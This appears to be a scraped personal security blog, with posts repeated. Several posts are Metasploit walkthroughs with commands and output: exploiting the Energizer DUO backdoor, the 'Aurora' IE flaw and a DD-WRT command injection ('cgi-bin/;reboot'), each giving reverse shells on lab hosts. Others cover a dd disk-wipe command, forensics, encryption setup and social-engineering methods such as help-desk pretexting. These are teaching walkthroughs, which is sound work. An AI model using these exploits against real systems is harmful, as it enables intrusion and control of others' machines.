As of release version 8749, you can now use Metasploit to locate infected systems on your local network using the following commands.
# msfconsole
msf > use auxiliary/scanner/backdoor/energizer_duo_detect
msf auxiliary(energizer_duo_detect) > set RHOSTS 10.0.0.0/24
msf auxiliary(energizer_duo_detect) > set THREADS 256
msf auxiliary(energizer_duo_detect) > run
[*] 10.0.0.23:7777 FOUND: [["F", "AUTOEXEC.BAT"] .......
To take things a step further and gain access to a system running this backdoor, use the energizer_duo_payload module:
msf > use exploit/windows/backdoor/energizer_duo_payload
msf exploit(energizer_duo_payload) > set RHOST 10.0.0.23
msf exploit(energizer_duo_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(energizer_duo_payload) > set LHOST 10.0.0.253
msf exploit(energizer_duo_payload) > exploit
[*] Started reverse handler on 10.0.0.23:4444
[*] Trying to upload C:\NTL0ZTL4DhVL.exe...
[*] Trying to execute C:\NTL0ZTL4DhVL.exe...
[*] Sending stage (747008 bytes)
[*] Meterpreter session 1 opened (10.0.0.23:4444 -> 10.0.0.253:1200)
meterpreter > getuid
Server username: HACKME\TestUser
Wednesday, 10 March 2010
Wednesday, 20 January 2010
Reproducing the "Aurora" IE Exploit
To get started, grab the latest copy of the Metasploit Framework and use the online update feature to sync latest exploits from the development tree. Start the Metasploit Console (msfconsole) and enter the commands in bold:
msf > use exploit/windows/browser/ie_aurora
msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ie_aurora) > set LHOST
msf exploit(ie_aurora) > set URIPATH /
msf exploit(ie_aurora) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on port 4444
[*] Local IP: http://192.168.0.151:8080/
[*] Server started.
msf exploit(ie_aurora) >
Open Internet Explorer on a vulnerable machine (we tested Windows XP SP3 with IE 6) and enter the Local IP URL into the browser. If the exploit succeeds, you should see a new session in the Metasploit Console:
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.151:4444 -> 192.168.0.166:1514)
msf exploit(ie_aurora) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: WINXP\Developer
meterpreter > use espia
Loading extension espia...success.
meterpreter > screenshot aurora.bmp
meterpreter > shell
Process 892 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Developer\Desktop>
msf > use exploit/windows/browser/ie_aurora
msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ie_aurora) > set LHOST
msf exploit(ie_aurora) > set URIPATH /
msf exploit(ie_aurora) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on port 4444
[*] Local IP: http://192.168.0.151:8080/
[*] Server started.
msf exploit(ie_aurora) >
Open Internet Explorer on a vulnerable machine (we tested Windows XP SP3 with IE 6) and enter the Local IP URL into the browser. If the exploit succeeds, you should see a new session in the Metasploit Console:
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.151:4444 -> 192.168.0.166:1514)
msf exploit(ie_aurora) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: WINXP\Developer
meterpreter > use espia
Loading extension espia...success.
meterpreter > screenshot aurora.bmp
meterpreter > shell
Process 892 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Developer\Desktop>
Monday, 2 November 2009
Dual Boot Windows XP and BackTrack with Encryption
A number of people have asked me how I am dual booting Windows XP and BackTrack and have both operating systems installed on a fully encrypted partitions. The follow is a rough guide to setting it up. It may not be the best way of setting up this type of configuration but if works for my needs. Your experiences may vary. My laptop has a 200GB IDE hard drive in it. Please adjust for your spec.
Before starting you may want to wipe your entire hard drive.
BackTrack /boot partition (not encrypted)
BackTrack / partition encrypted
Install Windows XP first (200GB)
Boot off BackTrack4 cd. fdisk /dev/hda create a /boot partition (hda2) 200MB create a / partition (hda3) remainder of disk. Setup the encrypted partition.
Run the BT installer and select /dev/mapper/root to be mounted as / and /dev/hda2 as /boot. Make sure you check the format box for /dev/mapper/root
Do not reboot just yet we need to modify a few files.
Next we need to edit the /etc/crypttab file. I'm going to keep the name root for / .
Next step is to edit /etc/fstab. The / should look like this. Amend if needed.
Next step is to add a few modules to the kernel.
Edit /etc/initramfs-tools/modules file and add the following to the end of the file.
aes-i586
sha256
dm-mod dm-crypt
Update your initrd with the following command.
Now time to fix grub.
Your BackTrack section should look like this.
Using TrueCrypt I fully encrypted the windows system partition (not full disk encryption) through TrueCrypt 6.3 and let it write its bootloader to the MBR. This will overwrite GRUB.
Don't worry we'll fix this later.
Boot with BackTrack cd and copied the truecrypt bootloader from the MBR to a file in the /boot partition. In my case hda2
I used these commands to do so:
Reinstalled grub to the MBR using these commands:
title XP
rootnoverify (hd0,0)
makeactive
chainloader (hd0,1)/truecrypt.mbr
boot
Before starting you may want to wipe your entire hard drive.
- dd if=/dev/urandom of=/dev/hda
BackTrack /boot partition (not encrypted)
BackTrack / partition encrypted
Install Windows XP first (200GB)
Boot off BackTrack4 cd. fdisk /dev/hda create a /boot partition (hda2) 200MB create a / partition (hda3) remainder of disk. Setup the encrypted partition.
- modprobe aes-i586
- cryptsetup luksFormat /dev/hda cryptsetup luksOpen /dev/hda3
- rootmkfs.ext3 –j –O extent /dev/mapper/root
Run the BT installer and select /dev/mapper/root to be mounted as / and /dev/hda2 as /boot. Make sure you check the format box for /dev/mapper/root
Do not reboot just yet we need to modify a few files.
- mkdir /mnt/root
- mount /dev/mapper/root /mnt/root
- mount /dev/hda2 /mnt/root/boot
- chroot /mnt/root
- mount –t proc proc /proc
- mount –t sysfs sys /sys
Next we need to edit the /etc/crypttab file. I'm going to keep the name root for / .
- root /dev/hda3 none luks
Next step is to edit /etc/fstab. The / should look like this. Amend if needed.
- /dev/mapper/root / ext3 relatime,errors=remount-ro 0 1 /dev/hda2 /boot ext3 defaults 0 0
Next step is to add a few modules to the kernel.
Edit /etc/initramfs-tools/modules file and add the following to the end of the file.
aes-i586
sha256
dm-mod dm-crypt
Update your initrd with the following command.
- update-initramfs –k all –c
Now time to fix grub.
- cd /boot/grub/ nano menu.lst
Your BackTrack section should look like this.
- title BackTrack 4
- uuid Your uuid of boot partition
- kernel /vmlinuz-2.6.29.4 root=/dev/mapper/root ro initrd /initrd.img-2.6.29.4 quiet
- grub-install /dev/hda
Using TrueCrypt I fully encrypted the windows system partition (not full disk encryption) through TrueCrypt 6.3 and let it write its bootloader to the MBR. This will overwrite GRUB.
Don't worry we'll fix this later.
Boot with BackTrack cd and copied the truecrypt bootloader from the MBR to a file in the /boot partition. In my case hda2
I used these commands to do so:
- dd if=/dev/hda of=/mnt/boot/truecrypt.mbr count=1 bs=512
- dd if=/dev/hda of=/mnt/boot/truecrypt.backup count=8 bs=32256
Reinstalled grub to the MBR using these commands:
- sudo grub
- install (hd0,1)/grub/stage1 (hd0) (hd0,1)/grub/stage2 0x8000 p
title XP
rootnoverify (hd0,0)
makeactive
chainloader (hd0,1)/truecrypt.mbr
boot
Monday, 21 September 2009
Dell R900 SQL Server 2005 Fails To Install
As part of a new platform deployment I recently took delivery of a number of servers one of which was a DELL R900 with 4x 6 core processors. After a base install of Windows Server 2003 R2 x64 I attempted to install SQL Server 2005 Enterprise. Setup failed with the following error: The SQL Server service failed to start. For more information , see the SQL Books Online....
Microsoft has confirmed that on a computer that has a multicore processor, if the ratio of logical processors to physical sockets is not a power of 2, you cannot install SQL Server 2005. Microsoft SQL Server 2005 Service Pack 2 and higher fixes this. However it it not possible to slipstream a service pack into SQL 2005 install cd / dvd. A quick fix is to modify the boot.ini file and add /NUMPROC=1 to the boot options.
Install SQL Server 2005.
Install SQL Server 2005 Service Pack 3
Remove the /NUMPROC=1 from boot.ini and reboot.
SQL will now see all processors.
Microsoft has confirmed that on a computer that has a multicore processor, if the ratio of logical processors to physical sockets is not a power of 2, you cannot install SQL Server 2005. Microsoft SQL Server 2005 Service Pack 2 and higher fixes this. However it it not possible to slipstream a service pack into SQL 2005 install cd / dvd. A quick fix is to modify the boot.ini file and add /NUMPROC=1 to the boot options.
Install SQL Server 2005.
Install SQL Server 2005 Service Pack 3
Remove the /NUMPROC=1 from boot.ini and reboot.
SQL will now see all processors.
Thursday, 13 August 2009
SSD Drives and IT Forensics - Update
In previous post The implication of new firmware released for OCZ SSD on computer forensics I asked a number of questions. The post was also send to an internal mailing list where I work. A number of responses came back and I thought I'd share them
1. What are the implications of having this included in the firmware of SSD drives and how would you acquire such a drive?
The implications are wide ranging, but essentially the volume of recoverable data may be reduced. (Forensic analysis of deleted items, system artefacts, etc may not be possible). However, acquisition methods will not be affected.
2. Does the firmware start clearing sectors when it is simply to a power supply or does it require other hardware to be attached?
3. If it starts clearing sectors when connected to a power supply what legal implication will this have if during the acquisition of the drive potential evidence is been deleted by the built-in firmware before if can be forensically acquired ?
No, the firmware does not clear sectors when powered up. It requires an operating system that supports the TRIM command. OCZ SSD's now have the ability to use TRIM under win7, linux, OSX but only where the operating system, firmware, and associated software are correctly installed.
4. Are "live" acquisitions still possible with SSD drives with this firmware if we want to consider them forensically sound images. For example creating a logical evidence file of an open encrypted container file.
Yes, see above, as TRIM is not supported under the linux kernel (and would never be supported for a forensic distribution) there will be no loss of data during forensic acquisition.
The only potential issue would be a live acquisition under an operating system that does support TRIM (potentially windows 7).
1. What are the implications of having this included in the firmware of SSD drives and how would you acquire such a drive?
The implications are wide ranging, but essentially the volume of recoverable data may be reduced. (Forensic analysis of deleted items, system artefacts, etc may not be possible). However, acquisition methods will not be affected.
2. Does the firmware start clearing sectors when it is simply to a power supply or does it require other hardware to be attached?
3. If it starts clearing sectors when connected to a power supply what legal implication will this have if during the acquisition of the drive potential evidence is been deleted by the built-in firmware before if can be forensically acquired ?
No, the firmware does not clear sectors when powered up. It requires an operating system that supports the TRIM command. OCZ SSD's now have the ability to use TRIM under win7, linux, OSX but only where the operating system, firmware, and associated software are correctly installed.
4. Are "live" acquisitions still possible with SSD drives with this firmware if we want to consider them forensically sound images. For example creating a logical evidence file of an open encrypted container file.
Yes, see above, as TRIM is not supported under the linux kernel (and would never be supported for a forensic distribution) there will be no loss of data during forensic acquisition.
The only potential issue would be a live acquisition under an operating system that does support TRIM (potentially windows 7).
Wednesday, 12 August 2009
The implication of new firmware released for OCZ SSD on computer forensics
UPDATE - Questions answered
On my daily trawl through various feeds, thanks Google Reader for making this so easy, I came across an article that discussed the "benefits" of this new firmware. While I tend to agree with the write from a performance standpoint the IT Forensics voice in my head was saying this could make my job more interesting.
This firmware is designed to keep the speed of the SSD drive as close as possible to that of a new drive even if the drive has been used over a long period of time . The flash memory used on the SSD drive is comprised of cells that usually contain 4KB pages that are arranged in blocks of 512KB. When a cell is unused, data can be written to it relatively quickly. But if a cell already contains some data, no matter how little even if it fills only a single page in the block,the entire block must be re-written.
This is because a memory cell has to be empty to have data written on it, even if it's only partially filled. The data already contained in the cell has to be copied to the cache, the new data to be added is then added to the cache, the old data in the cell is then erased and the new information in the cache copied to the memory cell. As time passes and all the cells are partially filled with old data,the SSD slows down as new data has to be added using the same process.
Basically what this means is that the way many SSD drives write data is not very efficient, and leaves all kinds of un-used data all over the place, which later causes slowdowns when it is needlessly rewritten.
Now what the new firmware from OCZ does is to apparently fix this while the drive is idle by clearing used memory cells of unneeded or unwanted data on a regular basis so they are instantly available for future use.
From a forensics perspective could this be considered a built-in "wiping" function on SSD drives. It is also worth noting that this could become the standard for all SSD drives.
This raises the following questions:
1. What are the implications of having this included in the firmware of SSD drives and how would you acquire such a drive?
2. Does the firmware start clearing sectors when it is simply to a power supply or does it require other hardware to be attached?
3. If it starts clearing sectors when connected to a power supply what legal implication will this have if during the acquisition of the drive potential evidence is been deleted by the built-in firmware before if can be forensically acquired ?
4. Are "live" acquisitions still possible with SSD drives with this firmware if we want to consider them forensically sound images. For example creating a logical evidence file of an open encrypted container file.
I would be interested in reading comments from anyone who has tested this or even theories on dealing with this in the wild.
UPDATE - Questions answered
On my daily trawl through various feeds, thanks Google Reader for making this so easy, I came across an article that discussed the "benefits" of this new firmware. While I tend to agree with the write from a performance standpoint the IT Forensics voice in my head was saying this could make my job more interesting.
This firmware is designed to keep the speed of the SSD drive as close as possible to that of a new drive even if the drive has been used over a long period of time . The flash memory used on the SSD drive is comprised of cells that usually contain 4KB pages that are arranged in blocks of 512KB. When a cell is unused, data can be written to it relatively quickly. But if a cell already contains some data, no matter how little even if it fills only a single page in the block,the entire block must be re-written.
This is because a memory cell has to be empty to have data written on it, even if it's only partially filled. The data already contained in the cell has to be copied to the cache, the new data to be added is then added to the cache, the old data in the cell is then erased and the new information in the cache copied to the memory cell. As time passes and all the cells are partially filled with old data,the SSD slows down as new data has to be added using the same process.
Basically what this means is that the way many SSD drives write data is not very efficient, and leaves all kinds of un-used data all over the place, which later causes slowdowns when it is needlessly rewritten.
Now what the new firmware from OCZ does is to apparently fix this while the drive is idle by clearing used memory cells of unneeded or unwanted data on a regular basis so they are instantly available for future use.
From a forensics perspective could this be considered a built-in "wiping" function on SSD drives. It is also worth noting that this could become the standard for all SSD drives.
This raises the following questions:
1. What are the implications of having this included in the firmware of SSD drives and how would you acquire such a drive?
2. Does the firmware start clearing sectors when it is simply to a power supply or does it require other hardware to be attached?
3. If it starts clearing sectors when connected to a power supply what legal implication will this have if during the acquisition of the drive potential evidence is been deleted by the built-in firmware before if can be forensically acquired ?
4. Are "live" acquisitions still possible with SSD drives with this firmware if we want to consider them forensically sound images. For example creating a logical evidence file of an open encrypted container file.
I would be interested in reading comments from anyone who has tested this or even theories on dealing with this in the wild.
UPDATE - Questions answered
Monday, 10 August 2009
Root on HTC Magic
[UPDATE]
1 Click Android Rooting ...
http://androidandme.com/2009/08/news/how-to-root-a-t-mobile-g1-and-mytouch-3g-android-phone/
I recently got a HTC Magic on Vodafone UK and decided that it was about time I got root on it.
Murphy's law states that anything that can go wrong will go wrong. Step 1 is always make sure you have a backup.
I downloaded the files from The Unlockr's Guide to getting root on HTC Magic. Since my phone is a Vodafone UK version I downloaded the 32B files.
After extracting the SDK to C:\AndroidSDK\ and the images to C:\AdnroidSDK\tools
I booted my phone into fastboot mode: Power on phone with the "Back" arrow held down.
Connect the usb cable, open a command prompt and and run the following from your AndroidSDK\tools folder:
fastboot boot recovery-new.img
Your phone will reboot and you will be presented by the Android System Recovery Menu.
Choose the "Nandroid Backup 2.1" option. After 2-5 minutes backups of your phones system,boot,recovery,data,misc and cache images will be copied to the phones SD card.
I then followed The Unlockr's Guide, unfortunately this didn't work for me and my phone just hung on at the Vodafone splash screen. I left it for about 20mins thinking that maybe it was doing some post load installs, but no not that lucky. Thinking that I may have just bricked my phone was not a happy feeling. Just as well I remembered Murphy and his laws. Now the next question: How do I get the backup back on to my phone. I tried to re-flash it by first wiping the failed flash
fastboot erase system -w
fastboot erase boot
fastboot flash system system.img
fastboot flash boot boot.img
fastboot flash recovery recovery.img
fastboot reboot
No sure luck all the fastboot flash options returned the same error:
FAILED (remote: signature verify fail)
Browsing through the xda-developers forum I came across the following post by Amon_RA that had a modified version of the HTC Magic recovery image.
I downloaded this and extracted it to c:\AndroidSDK\tools
So booting into fastboot mode again, opening a command prompt and running the following from C:\AndroidSDK\tools
fastboot boot recovery-RAv1.2.0G.img
The phone will boot the recovery image and you will notice and option titled
Nandroid V2.2 Restore
Selecting this option started the restore process. 5 minutes later my phone was fully working again. I guess I'll be waiting a bit longer for a working "root" image.
1 Click Android Rooting ...
http://androidandme.com/2009/08/news/how-to-root-a-t-mobile-g1-and-mytouch-3g-android-phone/
I recently got a HTC Magic on Vodafone UK and decided that it was about time I got root on it.
Murphy's law states that anything that can go wrong will go wrong. Step 1 is always make sure you have a backup.
I downloaded the files from The Unlockr's Guide to getting root on HTC Magic. Since my phone is a Vodafone UK version I downloaded the 32B files.
After extracting the SDK to C:\AndroidSDK\ and the images to C:\AdnroidSDK\tools
I booted my phone into fastboot mode: Power on phone with the "Back" arrow held down.
Connect the usb cable, open a command prompt and and run the following from your AndroidSDK\tools folder:
fastboot boot recovery-new.img
Your phone will reboot and you will be presented by the Android System Recovery Menu.
Choose the "Nandroid Backup 2.1" option. After 2-5 minutes backups of your phones system,boot,recovery,data,misc and cache images will be copied to the phones SD card.
I then followed The Unlockr's Guide, unfortunately this didn't work for me and my phone just hung on at the Vodafone splash screen. I left it for about 20mins thinking that maybe it was doing some post load installs, but no not that lucky. Thinking that I may have just bricked my phone was not a happy feeling. Just as well I remembered Murphy and his laws. Now the next question: How do I get the backup back on to my phone. I tried to re-flash it by first wiping the failed flash
fastboot erase system -w
fastboot erase boot
fastboot flash system system.img
fastboot flash boot boot.img
fastboot flash recovery recovery.img
fastboot reboot
No sure luck all the fastboot flash options returned the same error:
FAILED (remote: signature verify fail)
Browsing through the xda-developers forum I came across the following post by Amon_RA that had a modified version of the HTC Magic recovery image.
I downloaded this and extracted it to c:\AndroidSDK\tools
So booting into fastboot mode again, opening a command prompt and running the following from C:\AndroidSDK\tools
fastboot boot recovery-RAv1.2.0G.img
The phone will boot the recovery image and you will notice and option titled
Nandroid V2.2 Restore
Selecting this option started the restore process. 5 minutes later my phone was fully working again. I guess I'll be waiting a bit longer for a working "root" image.
Monday, 3 August 2009
Slipstream or integrate Office 2007 Service Pack 2 (SP2)
If like me you update and deploy software to new workstation on a regular basis you will quickly grow tired of installing MS Office and then installing the latest service pack. This quick guide will assist in slipstreaming the latest service pack (SP2) into MS Office 2007. I will assume that you will be installing office from a network share and have already copied the entire contents of the CD to this folder.
Download the standalone installer office2007sp2-kb953195-fullfile-en-us.exe to a temporary folder (c:\tmp)
Create folder called Updates (C:\Updates)
Open a command line window (CMD) and type the following on one line:
c:\updates\office2007sp2-kb953195-fullfile-en-us.exe /extract:C:\Updates
Agree to the EULA and then close the Installer when completed.
Move the contents of the C:\Updates folder to the Updates folder in your Office 2007 install folder structure.
Download the standalone installer office2007sp2-kb953195-fullfile-en-us.exe to a temporary folder (c:\tmp)
Create folder called Updates (C:\Updates)
Open a command line window (CMD) and type the following on one line:
c:\updates\office2007sp2-kb953195-fullfile-en-us.exe /extract:C:\Updates
Agree to the EULA and then close the Installer when completed.
Move the contents of the C:\Updates folder to the Updates folder in your Office 2007 install folder structure.
Enabling AHCI after installing Windows XP x64
Download the OS Pre-Install sata drivers and extract to a temporery location on the machine (c:\tmp).
Open Device Manager
under IDE ATA/ATAPI controllers you should see something like : Intel ICH9 Serial ATA Storage Controller.
Right-Click on that and select Update Driver
Say no to connecting to Windows Update to search, hit Next
Select Install from a list or specific location (Advanced), hit Next
Select "Don't search. I will choose the driver to install", hit Next
Select Have Disk
Browse to the Driver folder (c:\tmp\) and highlight the iastor.inf file, hit Open Select OK
Now you should have a list of controllers ICH9 /AHCI driver
You'll get warned that installing the device driver is not recommended, click Yes to continue installing
Click Finish
If you have more than one Intel ICH9 Serial ATA Storage Controller you will need to do this for each before restarting
When system boots enter the bios, navigate to the SATA Operation option or equivlant and set it to AHCI
Verify your sata ports enabled, save changes and exit.
After you log into Windows, your computer will find the "new" hardware. Wait until you get the popup message to restart your computer, say Yes to restart one last time.
Open Device Manager
under IDE ATA/ATAPI controllers you should see something like : Intel ICH9 Serial ATA Storage Controller.
Right-Click on that and select Update Driver
Say no to connecting to Windows Update to search, hit Next
Select Install from a list or specific location (Advanced), hit Next
Select "Don't search. I will choose the driver to install", hit Next
Select Have Disk
Browse to the Driver folder (c:\tmp\) and highlight the iastor.inf file, hit Open Select OK
Now you should have a list of controllers ICH9 /AHCI driver
You'll get warned that installing the device driver is not recommended, click Yes to continue installing
Click Finish
If you have more than one Intel ICH9 Serial ATA Storage Controller you will need to do this for each before restarting
When system boots enter the bios, navigate to the SATA Operation option or equivlant and set it to AHCI
Verify your sata ports enabled, save changes and exit.
After you log into Windows, your computer will find the "new" hardware. Wait until you get the popup message to restart your computer, say Yes to restart one last time.
Sunday, 26 July 2009
Expoliting the cgi-bin vulnerability in dd-wrt
Metasploit now has in the 3.3 Dev SVN an exploit for embedded device Linux distribution DD-WRT. This exploit module abuses a metacharacter injection vulnerability in the HTTP management server of wireless gateways running DD-WRT. This flaw allows an unauthenticated attacker to execute arbitrary commands as the root user account. In this example we are attacking from the LAN side of a Linksys WRT54GS running dd-wrt V24-SP1 using factory default settings.
msf exploit(handler) > use exploit/linux/http/ddwrt_cgibin_exec
msf exploit(ddwrt_cgibin_exec) > set PAYLOAD cmd/unix/reverse_netcat
PAYLOAD => cmd/unix/reverse_netcat
msf exploit(ddwrt_cgibin_exec) > set LPORT 4444
LPORT => 2222
msf exploit(ddwrt_cgibin_exec) > set RHOST 192.168.1.1
RHOST => 192.168.1.1
msf exploit(ddwrt_cgibin_exec) > set LHOST 192.168.1.12
LHOST => 192.168.1.12
msf exploit(ddwrt_cgibin_exec) > exploit
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Sending GET request with encoded command line...
[*] Command shell session 2 opened (192.168.1.1:4444 -> 192.168.1.12:4312)
uname -a
Linux DD-WRTx86CI 2.6.19.2dd-wrt #45 Fri Jan 26 06:28:01 CET 2007 i686 unknown
msf exploit(handler) > use exploit/linux/http/ddwrt_cgibin_exec
msf exploit(ddwrt_cgibin_exec) > set PAYLOAD cmd/unix/reverse_netcat
PAYLOAD => cmd/unix/reverse_netcat
msf exploit(ddwrt_cgibin_exec) > set LPORT 4444
LPORT => 2222
msf exploit(ddwrt_cgibin_exec) > set RHOST 192.168.1.1
RHOST => 192.168.1.1
msf exploit(ddwrt_cgibin_exec) > set LHOST 192.168.1.12
LHOST => 192.168.1.12
msf exploit(ddwrt_cgibin_exec) > exploit
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Sending GET request with encoded command line...
[*] Command shell session 2 opened (192.168.1.1:4444 -> 192.168.1.12:4312)
uname -a
Linux DD-WRTx86CI 2.6.19.2dd-wrt #45 Fri Jan 26 06:28:01 CET 2007 i686 unknown
DD-WRT httpd vulnerability
As reported at www.milw0rm.com there is a vulnerability in the http-server for the DD-WRT management GUI that can be used for execution of an exploit to gain control over the router.
Note: The exploit can only be used directly from outside your network over the internet if you have enabled remote Web GUI management in the Administration tab. As immediate action please disable the remote Web GUI management. But that limitation could be easily overridden by a Cross-Site Request Forgery (CSFR) where a malicious website could inject the exploit from inside the browser.
They guys over at dd-wrt have fixed the issue and generated new builds of the latest DD-WRT version. You can temporarily download the these files from here until we did update the router database.
[UPDATE] The guys over at dd-wrt have integrated most of the fixed build files into the router database. You can check there if files for build 12533 are available for your router. If not (yet) please check the location mentioned above to obtain the files.
The exploit can also be stopped, using a firewall rule: Go to your router's admin interface to > Administration > Commands and enter the following text:insmod ipt_webstr
ln -s /dev/null /tmp/exec.tmp
iptables -D INPUT -p tcp -m tcp -m webstr --url cgi-bin -j REJECT --reject-with tcp-reset
iptables -I INPUT -p tcp -m tcp -m webstr --url cgi-bin -j REJECT --reject-with tcp-reset press "Save Firewall" and reboot your router. This rule blocks any attempt to access sth that has "cgi-bin" in the url. You can verify that the rule is working by entering: http://192.168.1.1/cgi-bin/;reboot in your browser. That should give a "Connection was reset" (Firefox).
Important Note: This only works for non-https requests. if you have HTTPS Management turned on under > Administration > Management > Remote Access, then turn it off. If you don't want to turn it off, you only can do an Update.
Friday, 15 May 2009
Disable System Beep In VMWare
Is the system beep in vmware hurting your ears when linux or FreeBSD machines are reboot.
Add the following line to the .vmx file for that vmware machine.
mks.noBeep = "TRUE"
Add the following line to the .vmx file for that vmware machine.
mks.noBeep = "TRUE"
Friday, 1 May 2009
Forensics and Disk Encryption
The challenges for the computer forensics investigator have increased over the past few years.
Companies are deploying disk and volume based encryption systems.The traditional method of “pull the plug” then forensically image the hard drive is changing
Before powering down a computer, consider the potential of encryption software being installed on the computer or as part of the operating system. If present, appropriate forensic methods should be utilised to capture the encrypted data before the computer is powered down.
There are essentially two competing solutions
- Gather the “best” evidence available
- Allow the system to continue operation in an unhindered manner
With encrypted drives becoming more common in the corporate environment this means that without the cooperation of the suspect or a master key / password supplied by the IT department the data essentially unreadable.
Under APCO guidelines (Good Practice Guide for Computer based Electronic Evidence V.3) there are no guidelines for the collection of encrypted hard drives. Similarly the US Secret Service Best Practice Guide for Seizing Electronic Evidence V.3 makes no mention of encrypted hard drives either.
Identifying encrypted disks
It depends on how the encryption works. You may want to look for the following.
icons in the taskbar
startmenu entries
common filenames and paths (pointsec , safeguard easy , drivecrypt , PC Guardian)Looking at the MBR, most of the diskencryption software use pre boot auhtentication (for example safeguard)
Look at mounted devices in the registry, good way to determine volume encryption (for example truecrypt)
Prerequisites for live imaging
Document everything you do. Document everything you ask a trusted system administrator / information security person to do. In order to image a live system you need to be logged on as a local admin level user. The end result is the need to gather an evidential copy of a system.
A physical disk image may not be the best evidence as the data may be unreadable. Live aquaisation enables the investigator to gather volatile information such as memory, process list, network connections, open files etc.
What is live imaging
Taking a copy of a system while that system is still functioning in a live environment
Why would you image a live machine ?
Business critical systems that cannot be shut down. Shutting down systems may create legal liability for examiners through:
damaging equipment
unintentional data loss
hampering operations
Instructions that evidence gathering must be conducted using the least intrusive methods available.
Encrypted volumes
Tools
Helix (dd/netcat)
Prodiscover IR
Encase EEE/FIM
FTK
Issues surrounding imaging a live system.
The system is essentially “un-trusted”. This raises the following questions. How do we know we have collected all the original evidence on an un-trusted system? Can the machine be accessed remotely? Rootkits ?
Some options available for forensic imaging of encrypted drives.
Non Live Image
Microsoft Windows system
Capture live data, memory dump, current network connections, open files , running processes. Shut down machine normaly. Pulling the plug may cause data loss on encrypted drives.
Remove the drive
Image the drive using a forensic disk cloner such as a SOLO
Option 1
Single capture using two drives. Target and Backup
Bag & Tag the original
Bag & Tag the target
Boot suspect machine using the backup and admin level credentials
Live image of the machine
Option 2
DD capture using two drives
Bag & Tag the original
Bag & Tag the target
Restore backup dd image to a “restore drive”
Option 2A
Boot suspect machine using the “restore drive” and admin level credentials
Live image of the machine
Option 2B
Mount restore drive in VMware
Boot suspect machine using the “restore drive” and admin level credientials Live image of the machine
Image the drive with encase then follow Option 2A or Option 2B
Live Image
Microsoft Windows system
Capture live data, memory dump, current network connections, open files , running processes
Disconnect from network both wired and wireless.
Run ftkimager from a trusted cd or usb drive (having noted the serial number and other identifying features so it can be recognised in the registry if required at a later date).
Create a logical evidence file of each logical drive on a external usb hard drive (having noted the serial number and other identifying features so it can be recognised in the registry if required at a later date) ensuring you hash the drive contents.
Create a backup copy of the logical evidence files on another drive.
You may also create the two copies at the same time by connecting the two drives to the suspect machine.
Verify both target and backup images.
Thursday, 23 April 2009
Backtrack 4 Beta and Nessus 4.0.0
I recently installed Nessus 4.0.0 on a vmware install of BackTrack 4 Beta. Below are the steps I took.
Download the following linux packages from the nessus website.
Nessus-4.0.0-ubuntu804_i386.deb
NessusClient-4.0.0-ubuntu804_i386.deb
You will also need to register in order to obtain the activation key.
Before installing we will need to install some missing dependencies
apt-get install libqt4-core libqt4-gui libqtcore4 libqt4-network libqt4-script libqt4-xml libqt4-dbus libqt4-test libqtgui4 libqt4-svg libqt4-opengl libqt4-designer libqt4-assistant
Install the server.
# dpkg -i Nessus-4.0.0-ubuntu804_i386.deb
Configure the certificate
# /opt/nessus/sbin/nessus-mkcert
Add the admin user
# /opt/nessus/sbin/nessus-adduser
# /opt/nessus/bin/nessus-fetch --register 'your_registration_key'
# dpkg -i NessusClient-4.0.0-ubuntu804_i386.deb
# /etc/init.d/nessusd start
And start the client from the Menu>Intenet>NessusClient or use the CLI
Download the following linux packages from the nessus website.
Nessus-4.0.0-ubuntu804_i386.deb
NessusClient-4.0.0-ubuntu804_i386.deb
You will also need to register in order to obtain the activation key.
Before installing we will need to install some missing dependencies
apt-get install libqt4-core libqt4-gui libqtcore4 libqt4-network libqt4-script libqt4-xml libqt4-dbus libqt4-test libqtgui4 libqt4-svg libqt4-opengl libqt4-designer libqt4-assistant
Install the server.
# dpkg -i Nessus-4.0.0-ubuntu804_i386.deb
Configure the certificate
# /opt/nessus/sbin/nessus-mkcert
Add the admin user
# /opt/nessus/sbin/nessus-adduser
# /opt/nessus/bin/nessus-fetch --register 'your_registration_key'
# dpkg -i NessusClient-4.0.0-ubuntu804_i386.deb
# /etc/init.d/nessusd start
And start the client from the Menu>Intenet>NessusClient or use the CLI
Wednesday, 22 April 2009
Social Engineering Investigations
Below is a general outline for investigating social engineering style attacks. This article is meant for discussion purposes only.
One thing you need to be aware of is that social engineering is not just limited to IT systems it is an issue for the entire organisation.
Social engineering attacks can vary from low tech to high tech.
There are many factors that can lead to a successful social engineering attack.
Normally an attacker would first take a look at the company website as these are normally filled with lots of useful information, such as the names, positions and phone numbers of staff.
Organisations need to be aware of just how much information they are giving away on their websites.
Its also common practice in organisations that a users email address will be the same as their network user name. The password for email may also be the same as the network logon, this is normally true in situations where a organisation is using Microsoft Exchange.
Armed with this information an attacker may call the help desk posing as someone in a senior position in the organisation asking for "help" on how to connect to the network from home. Help desk staff have been surprisingly helpful to me in the past when I have attempted this type of attack.
An attacker may also pose as a sales rep or as an employee of a IT related magazine or journal or even as someone seeking employment and ask to speak to the help desk / IT department. When connected they would ask a series of questions relating to the computer systems in place. Such as operating systems ( Windows, Apple Mac's, Linux / Unix) network infrastructure, wireless, remote access, web based email etc.
This information can help an attacker target specific areas of the network, such as wireless access points or remote access systems.
Also organisations will typically have large bins outside the premises, around the back, near the car park, basement level etc. Since the bins are collected and / or emptied by third parties access to them is rarely restricted.
The amount of information that can be recovered from looking through a companies rubbish can be very rewarding. Such as customer records, employee records, financial statements and other sensitive company data. This style of attack is commonly known as "dumpster diving".
